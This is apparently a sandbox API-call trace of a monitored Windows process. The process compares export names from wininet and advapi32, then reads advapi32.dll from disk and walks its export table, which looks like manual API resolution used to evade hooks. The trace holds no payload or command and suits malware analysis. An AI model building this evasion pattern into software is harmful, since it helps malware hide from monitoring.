[0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0134.628] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0134.629] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0134.777] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0134.777] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0134.778] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0134.778] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0134.779] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0134.781] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0134.792] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0134.792] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0134.792] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0134.792] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0134.792] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.792] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0134.792] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0134.793] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0134.794] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0134.795] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0134.795] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0134.795] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0134.795] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0134.795] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0134.795] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0134.811] GetProcessHeap () returned 0x470000 [0134.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4154040 | out: hHeap=0x470000) returned 1 [0134.942] GetProcessHeap () returned 0x470000 [0134.942] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489db0 [0134.945] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0134.946] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0134.946] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0134.946] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0134.946] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0134.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0134.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0134.947] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0134.947] GetProcessHeap () returned 0x470000 [0134.947] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa3ef0) returned 0x2d92010 [0134.950] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0134.950] ReadFile (in: hFile=0x140, lpBuffer=0x2d92010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d92010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0134.962] CloseHandle (hObject=0x140) returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0134.962] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0134.962] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0134.962] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0134.962] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.963] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0134.964] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0134.965] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 